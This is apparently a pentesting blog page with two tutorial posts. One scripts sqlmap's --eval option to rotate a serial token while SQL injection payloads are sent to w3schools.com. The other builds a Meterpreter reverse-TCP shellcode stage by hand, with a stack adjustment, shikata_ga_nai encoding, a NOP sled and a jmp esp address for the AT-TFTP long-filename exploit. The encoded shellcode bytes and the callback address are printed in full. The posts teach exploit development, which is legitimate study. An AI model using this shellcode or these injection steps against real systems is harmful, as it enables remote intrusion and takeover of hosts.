❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayÆther Security Lab

Advanced sqlmap features – eval

By: geri
21 July 2014 at 14:22

I was always sad when I couldn’t use sqlmap when the injection was not very simple. Of course I always expected that to be my fault, that I didn’t spent enough time to configure sqlmap properly. So the other day when I tested an application and found an sql injection which was a pain in the neck to exploit manually, I rolled up my sleeves and started to look at source code of sqlmap to figure out some parameters which I never knew what they did. This blog post is about the --eval parameter which allows you to manipulate the requests before sending them.

If you look at the sqlmap help, it says the following about --eval:

    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")

This sounds pretty good, but I still had no idea what you can do with it exactly. A good way to find that out is to do a little debugging. If you look at the sqlmap\lib\core\common.py:evaluateCode() method you will see the following:

def evaluateCode(code, variables=None):
    """
    Executes given python code given in a string form
    """
    try:
        exec(code, variables)
    except KeyboardInterrupt:
        raise
    except Exception, ex:
        errMsg = "an error occurred while evaluating provided code ('%s'). " % ex
        raise SqlmapGenericException(errMsg)

This means that your given code is executed with the exec() method. I still didn’t know though,what would be there inside this exec. I wanted to know what can I access and alter with my input code. For the examples here, I am gonna use the form in a W3C example (http://www.w3schools.com/tags/tryit.asp?filename=tryhtml_form_submit), and I will also add some parameters, which are not really existing but it still shows how sqlmap works. So my test request is the following, which is saved in the w3c_post.txt:

POST /tags/demo_form.asp HTTP/1.1
Host: www.w3schools.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.w3schools.com/tags/tryit_view.asp?x=0.604968847923233
Cookie: __utma=119627022.1380380815.1405671958.1405671958.1405671958.1; __utmb=119627022.2.10.1405671958; __utmc=119627022; __utmz=119627022.1405671958.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __gads=ID=187243b56c146e0d:T=1405671959:S=ALNI_MYjoCljcFie0P9TsOfInWm4lnIjOA; ASPSESSIONIDCSTCRCBQ=KMCPDGBAELNBLLBJDDBHDNCP
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

FirstName=Mickey&LastName=Mouse&Serial=1

I added the Serial parameter, because that is gonna be our test scenario. Many applications use serial numbers in requests, and go to an error state if the serial is wrong. That is a huge bummer when you automate testing because you always have to increment this parameter. That is what we are gonna do with sqlmap. So our goal is to get sqlmap to send the attack request always with an incremented serial number.

But first lets debug a bit more. The best way I found to check the possibilies of --eval is to break with a debugger inside the exec(). You can do that with ipdb (if you don’t have it installed: pip install ipdb). So start sqlmap with the following configuration:

PS H:\My Documents\testing\sqlmapproject-sqlmap-33b6d18> python.exe .\sqlmap.py -l .\w3c_post.txt -v 6 --level=5 --risk=2 --eval="import ipdb; ipdb.set_trace()"

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 10:46:14

[10:46:14] [DEBUG] cleaning up configuration parameters
[10:46:14] [DEBUG] parsing targets list from '.\w3c_post.txt'
[10:46:14] [DEBUG] not a valid WebScarab log data
[10:46:14] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[10:46:14] [DEBUG] setting the HTTP timeout
[10:46:14] [DEBUG] setting the HTTP method to GET
[10:46:14] [DEBUG] creating HTTP requests opener object
[10:46:14] [DEBUG] initializing the knowledge base
URL 1:
POST http://www.w3schools.com:80/tags/demo_form.asp
Cookie: __utma=119627022.1380380815.1405671958.1405671958.1405671958.1; __utmb=119627022.2.10.1405671958; __utmc=119627022; __utmz=119627022.1405671958.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __gads=ID=187243b56c146e0d:T=1405671959:S=ALNI_MYjoCljcFie0P9TsOfInWm4lnIjOA; ASPSESSIONIDCSTCRCBQ=KMCPDGBAELNBLLBJDDBHDNCP
POST data: FirstName=Mickey&LastName=Mouse&Serial=1
do you want to test this URL? [Y/n/q]
>
[10:46:17] [INFO] testing URL 'http://www.w3schools.com:80/tags/demo_form.asp'
[10:46:17] [INFO] using 'C:\Users\z003am9f\.sqlmap\output\results-07182014_1046am.csv' as the CSV results file in multiple targets mode
[10:46:18] [INFO] testing connection to the target URL
--Return--
None
> <string>(1)<module>()

ipdb>

As you see ipdb broke, and we have a debugging shell inside the exec(). Now the best way to look around is to run locals() to see what is available in that environment. I won’t show that because it is a huge structure, however what you should see hidden between random variables is the POST parameters from your request:

ipdb> print FirstName
Mickey
ipdb> print LastName
Mouse
ipdb> print Serial
1
ipdb>

This is a great thing, because it means that you can directly manipulate the POST parameters from your python code. Now what we need to do is to write a python code which increments the Serial variable. Since I didn’t know how to save state inside python, I went in the hard way and saved the serial counter in a file. The not-too-sophisticated code to do that is:

f = open("cnt.txt","r+")
Serial = int(f.readline())
f.seek(0,0)
f.write(str(Serial+1))
f.close()

It opens the file where the serial number is stored, updates the Serial variable, and increments the number in the file. So let’s try it with sqlmap (note: be careful with the quotes in your python code):

$ python.exe .\sqlmap.py -l .\w3c_post.txt -v 6 --level=5 --risk=2 --eval="f = open('cnt.txt','r+'); Serial = int(f.readline()); f.seek(0,0); f.write(str(Serial+1)); f.close()"

In the following snippet from the logs you can clearly see that the Serial was always properly incremented:

[11:16:09] [PAYLOAD] Mickey') AND 8899=1627
[11:16:09] [TRAFFIC OUT] HTTP request [#10]:
POST /tags/demo_form.asp HTTP/1.1
Accept-language: en-US,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: www.w3schools.com
Referer: http://www.w3schools.com/tags/tryit_view.asp?x=0.604968847923233
Cookie: __utma=119627022.1380380815.1405671958.1405671958.1405671958.1; __utmb=119627022.2.10.1405671958; __utmc=119627022; __utmz=11962702.1405671958.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __gads=ID=187243b56c146e0d:T=1405671959:S=ALNI_MYjCljcFie0P9TsOfInWm4lnIjOA; ASPSESSIONIDCSTCRCBQ=KMCPDGBAELNBLLBJDDBHDNCP
Content-type: application/x-www-form-urlencoded
Content-length: 67
Connection: close

FirstName=Mickey%27%29%20AND%208899%3D1627&LastName=Mouse&Serial=14

[11:16:09] [TRAFFIC IN] HTTP response [#10] (200 OK):
[11:16:09] [PAYLOAD] Mickey' AND 3958=8005
[11:16:09] [TRAFFIC OUT] HTTP request [#11]:
POST /tags/demo_form.asp HTTP/1.1
Accept-language: en-US,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: www.w3schools.com
Referer: http://www.w3schools.com/tags/tryit_view.asp?x=0.604968847923233
Cookie: __utma=119627022.1380380815.1405671958.1405671958.1405671958.1; __utmb=119627022.2.10.1405671958; __utmc=119627022; __utmz=11962702.1405671958.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __gads=ID=187243b56c146e0d:T=1405671959:S=ALNI_MYjCljcFie0P9TsOfInWm4lnIjOA; ASPSESSIONIDCSTCRCBQ=KMCPDGBAELNBLLBJDDBHDNCP
Content-type: application/x-www-form-urlencoded
Content-length: 64
Connection: close

FirstName=Mickey%27%20AND%203958%3D8005&LastName=Mouse&Serial=15

[11:16:09] [TRAFFIC IN] HTTP response [#11] (200 OK):
[11:16:09] [PAYLOAD] Mickey' AND 7730=7730
[11:16:09] [TRAFFIC OUT] HTTP request [#12]:
POST /tags/demo_form.asp HTTP/1.1
Accept-language: en-US,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: www.w3schools.com
Referer: http://www.w3schools.com/tags/tryit_view.asp?x=0.604968847923233
Cookie: __utma=119627022.1380380815.1405671958.1405671958.1405671958.1; __utmb=119627022.2.10.1405671958; __utmc=119627022; __utmz=11962702.1405671958.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __gads=ID=187243b56c146e0d:T=1405671959:S=ALNI_MYjCljcFie0P9TsOfInWm4lnIjOA; ASPSESSIONIDCSTCRCBQ=KMCPDGBAELNBLLBJDDBHDNCP
Content-type: application/x-www-form-urlencoded
Content-length: 64
Connection: close

FirstName=Mickey%27%20AND%207730%3D7730&LastName=Mouse&Serial=16

With that we’ve reached our goal.

To go a bit further, I would like to add a more complicated example where you could see the real power in this feature. In my test, the new serial number was always embedded in the last response. The problem was that sometimes the system broke and my serials went out of sync. So I decided that it would be better to send a useless request to get a fresh serial number and use that in the attack request. Of course it slows down the test because it doubles the number of requests, but on the other hand it goes in the direction of beating CSRF protections, which could be also really useful.

The following code creates a method which is responsible to get the newest serial number:

#!/usr/bin/env python
import httplib
from StringIO import StringIO
import gzip
from lxml import html

def getSerial():
     conn = httplib.HTTPSConnection("www.w3schools.com")
     headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
     "Accept-Language": "en-US,en;q=0.5",
     "Accept-Encoding": "gzip, deflate",
     "Referer": "https://www.w3schools.com/tags/demo_form.asp",
     "Connection": "keep-alive"}
     conn.request("GET", "/tags/demo_form.asp", None, headers)
     resp = conn.getresponse()
     buffer = StringIO(resp.read())
     deflatedContent = gzip.GzipFile(fileobj=buffer)
     content_text = deflatedContent.read()
     content_tree = html.fromstring(content_text)
     serial_number = content_tree.xpath('//input[@name="Serial"]/@value')
     conn.close()

     return serial_number[0]

Note that this is not gonna work because W3C doesn’t replies with a serial number, it is a mere example.

In the getSerial() method, we open a connection to the target server, set up the headers, send the request. Since the response was compressed in my case, it had to be decompressed and parsed to retrieve the new Serial.

This code was saved in the increment.py, thus it could be used as a library in the --eval:

python.exe .\sqlmap.py -l .\w3c_post.txt -v 6 --level=5 --risk=2 --eval="import increment; Serial=increment.getSerial()"

As I said, this is not a working example, but I think you can see the potential in it.

So that is about scripting sqlmap so far, have fun with it.

Stack Adjustment by hand

By: geri
23 June 2013 at 18:20

When you are developing an exploit and you have very limited space for your payload you might need to adjust the stack to be able to use staged exploits. The problem, in case of a multi-stage payload, is that when the first stage that you send in your exploit payload starts to download the second stage, the stack pointer (ESP) might point to a place which is not far enough from the first stage in the memory; hence, the second stage might corrupt the code that you are executing. Stack adjustment is a technique that tries to solve this problem by setting the ESP to create more space for the second stage.

There is an easy solution for that which is really straight forward in metasploit. In your exploit you can set the β€˜StackAdjustment’ attribute of the payload. Our simple example will be the β€˜attftp_long_filename’ exploit with with the β€˜windows/meterpreter/reverse_nonx_tcp’ payload. As you can see in the [MSF]/msf3/modules/exploits/windows/tftp/attftp_long_filename.rb it is set to -3500. That will subtract 3500 from the ESP just before executing the payload to make enough space for the second stage. In my case the question was, how to do the same without metasploit.

It is actually not that difficult but I wanted to write about it just for the record. As a PoC I implemented the same exploit in python using the same payload, but I will focus here on creating the payload. Our goal will be to create a payload with the following structure:

NOPsled + StackAdjustment + shellcode

Lets start from behind.

Shellcode

I used the β€˜msfpayload’ to generate the first stage of the payload and save it in a file in raw format. I intentionally didn’t encode it at the beginning because I wanted to encode it together with the StackAdjustment, otherwise it wouldn’t fit in the available space. So first let’s generate the payload:

root@bt:/tmp# msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=192.168.56.102 LPORT=7777 R > payload
root@bt:/tmp# hexdump payload
0000000 6afc 47eb f9e8 ffff 60ff db31 7d8b 8b3c
0000010 3d7c 0178 8bef 2057 ea01 348b 019a 31ee
0000020 99c0 c1ac 0dca c201 c084 f675 6643 ca39
0000030 e375 8b4b 244f e901 8b66 591c 4f8b 011c
0000040 03e9 992c 6c89 1c24 ff61 31e0 64db 438b
0000050 8b30 0c40 708b ad1c 688b 5e08 5366 6866
0000060 3233 7768 3273 545f b966 6072 d6ff 5395
0000070 5353 4353 4353 8953 66e7 ef81 0208 5357
0000080 b966 dfe7 d6ff b966 6fa8 d6ff 6897 a8c0
0000090 6638 6866 611e 5366 e389 106a 5753 b966
00000a0 0557 d6ff b450 500c 5753 6653 c0b9 ff38
00000b0 00e6                                  
00000b1

StackAdjustment

Then let’s see how to do the StackAdjustment. We will subtract 3500 from the ESP, that will make enough space for the second stage payload. To do that the β€˜sub esp, 0xDAC’ command has to be executed on the target. We can find out the opcode with the nasm_shell.rb tool of metasploit;

root@bt:/opt/metasploit/msf3# ./tools/nasm_shell.rb 
nasm > sub esp, 0xDAC
00000000  81ECAC0D0000      sub esp,0xdac 

The happy marriage with encoding

We need to put this opcode before the msf payload and of course it has to be encoded because there are too many 0x00 characters. To do this I just catted together the opcode and the payload and piped it into the msfencode:

root@bt:/tmp# cat stack_adj payload | msfencode -b '\x00\xff' -t ruby
[*] x86/shikata_ga_nai succeeded with size 210 (iteration=1)

buf =
"\xbe\x15\x4a\xd1\x8c\xda\xde\xd9\x74\x24\xf4\x5f\x31\xc9" +
"\xb1\x2e\x83\xc7\x04\x31\x77\x11\x03\x77\x11\xe2\xe0\xcb" +
"\x3d\x20\x07\xcc\xbd\xc5\x7d\x27\xfa\xdd\x78\x48\xfa\xe1" +
"\x1a\x86\xde\x95\xa7\xd4\x6b\xd5\x6a\x5d\x6d\xc9\x1f\xca" +
"\x4d\x14\xf5\x7e\xb9\x8c\x08\x6f\xf3\x70\x93\xc3\x35\xba" +
"\xae\x1a\x74\xbf\x70\x69\x8e\x83\x16\xab\xa4\x71\x35\x80" +
"\xb3\x35\x9d\x16\x2d\xaf\x56\x04\xf4\xbb\x27\x29\x07\x55" +
"\xb4\x7d\x9e\x2c\xd6\x59\xbc\x4f\xd9\x42\x8d\x54\x41\x08" +
"\xad\x5a\x02\x4e\x3e\x10\x64\x53\x93\xad\xec\x63\xb5\xd7" +
"\xbf\x15\x21\x2b\x0d\xb2\xc6\x38\x43\x1d\x7d\xd9\x1a\xd3" +
"\x1d\xda\x8a\x81\x8d\x77\x61\xf9\x72\x2b\xc6\xae\xfd\x2c" +
"\xae\xd1\x11\xba\x2c\x85\xbe\xdd\x89\xce\x9e\xdd\x3f\x76" +
"\x98\x8a\xd0\x88\x0c\x5d\x46\xb7\x19\x5a\xf0\x51\x32\x85" +
"\x9d\xfb\x91\x30\xbe\x6e\x06\x10\x17\x09\x9f\xc1\x92\x2a" +
"\x09\xbd\x28\xd8\xe6\x6d\x07\xb2\x60\x2b\x67\x0c\x92\xad"

It was important to encode them together otherwise it would not fit in the 223 byte space available in the exploit.

NOPsled

The NOPsled can be easily created with metasploit, since the encoded shellcode is 210 bytes and we need to fill 223 bytes, we need to generate a 13 bytes long NOPsled:

msf  > use nop/x86/opty2
msf  nop(opty2) > generate -h
Usage: generate [options] length

Generates a NOP sled of a given length.

OPTIONS:

    -b <opt>  The list of characters to avoid: '\x00\xff'
    -h        Help banner.
    -s <opt>  The comma separated list of registers to save.
    -t <opt>  The output type: ruby, perl, c, or raw.

msf  nop(opty2) > generate -b '\x00\xff' 13
buf =
"\x48\x4f\x2d\x25\xbb\x66\xba\x3d\x47\x41\x2f\xd6\xfd"

Putting everything together

In my exploit, I simply concatenated everything together:

nopsled = "\x48\x4f\x2d\x25\xbb\x66\xba\x3d\x47\x41\x2f\xd6\xfd"
shellcode = nopsled
shellcode = shellcode + buf
shellcode = shellcode + "\x53\x93\x42\x7e" #jmp esp address
shellcode = shellcode + "\x83\xc4\x28\xc3" # add esp \x28; retn

Summary

The important takeaway here is how to adjust your stack manually if for some reason you can’t use metasploit. It is not difficult you just need to get your hands a bit dirty with bytes and hex.

❌
❌